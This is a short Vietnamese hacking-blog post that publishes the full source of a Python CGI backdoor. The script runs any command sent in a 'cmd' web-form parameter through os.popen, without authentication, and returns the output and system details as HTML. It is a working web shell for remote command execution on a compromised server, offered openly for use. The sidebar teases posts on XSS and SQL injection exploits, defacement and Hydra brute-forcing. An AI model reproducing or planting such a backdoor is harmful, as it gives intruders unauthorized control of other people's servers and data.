Friday, March 30, 2012

#!/usr/bin/env python
# Info : Linux based CGI backdoor with python
# author: otoy
# date : 0x102010

import cgi,os,re,sys

form = cgi.FieldStorage()
cmd = form.getvalue('cmd', '')
osexe = os.popen(cmd)

dirt = os.getcwd()+'/'
prognm = sys.argv[0].strip()
progfl = re.findall(dirt+'(.*)',prognm)[0]

osinf = os.uname()
info='''====================================
CGI python backdoor
====================================
Author : otoy
Date : 0x102010
Blog : <a href="http://otoyrood.wordpress.com" target="_blank">otoyrood.wordpress.com</a>
====================================
System : %s %s
====================================
''' %(osinf[0], osinf[2])

print "Content-type: text/html"
print

print"""
<html>
<head>
<title>CGI python backdoor</title>
</head>
<body>
<pre>%s</pre>
<form action='%s'>
Command <input type='text' name='cmd' />
<input type='submit' />
</form>
<pre>%s</pre>
</body>
</html>
""" %(info,progfl,osexe.read())

CGI python backdoor

Uploaded by: MIN Software

Views:

Category: CGI, Shell

Share

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Giao diện Bài viết PC - Biết cấu trúc blogger thi lam trung 1 giao diện o đây ko phải tách thành 2 teamplates để tích hợp wap/web. ko biết thì kệ nó nha :)) Rip by : nguagovt - bay68.com

Post a Comment

Giao diện Phân trang PC - Biết cấu trúc blogger thi lam trung 1 giao diện o đây ko phải tách thành 2 teamplates để tích hợp wap/web. ko biết thì kệ nó nha :)) Rip by : nguagovt - bay68.com

Popular Posts
- PhpFox 3.0.1 Cross Site Scripting
  
  Google Dork: Intext:"Powered By phpFox Version 3.0.1" Vendor Home : http://www.phpfox.com/ There are lots of parametrs Vulnerab...
- Đời UG :::: Đam mê – Tiền Và Gái ::: [Part 2] – End
  
  Part 2 (End) 11. toan9x Năm lớp 7 bắt đầu biết ra quán net, thấy người ta vào internet, thì cũng đú đởn mà vào. Vào site cuaqr họ sao mà t...
- Wordpress Social Discussions 6.1.1 File Inclusion / Path Disclosure
  
  Author: Janek Vind "waraxe" Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-93.html Description of vulnerable target: ...
- Deface Page Generator version 1.0
  
  Chức năng: Tạo Deface Page tự động (thích hợp cho những bạn không thành thạo về HTML/JS/CSS) Giao diện Aero, dễ nhìn, thân thiện. Phân chia ...
- Sphpforum 0.4 Cross Site Scripting / SQL Injection
  
  # Product: sphpforum # Version: 0.4 (older versions may be affected) # # Software Download: http://sourceforge.net/projects/sphpforum/ # Des...
- Get vBulletin Version
  
  Chức năng: Scan phiên bản của vBB. Hoạt động: Quét dựa vào mã nguồn/CSS/JS của vBB (lợi dụng các comment của vBulletin TeaM để đóng bản quyề...
- XSS Hacking Exposed & Explained
  
  XSS Hacking Exposed & Explained By: magikh0e ...
- Brute force http forms (tool :Hydra)
  
  Các tùy chọn: Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME...
- [TUT] SQLi - Login AdminCP - Deface with XSS
  
  * Tutorial khai thác "ChangUonDyU - Advanced Statistics SQL injection", truy vấn lấy hash để bypass AdminCP, Deface sử dụng XSS. *...
- Devil May Cry - CrossFire UI Login
  
  Download: http://www.mediafire.com/?1thbk43dbc16k1k

Copyright © hacker va bao mat | Designed by Templateism.com | WPResearcher.com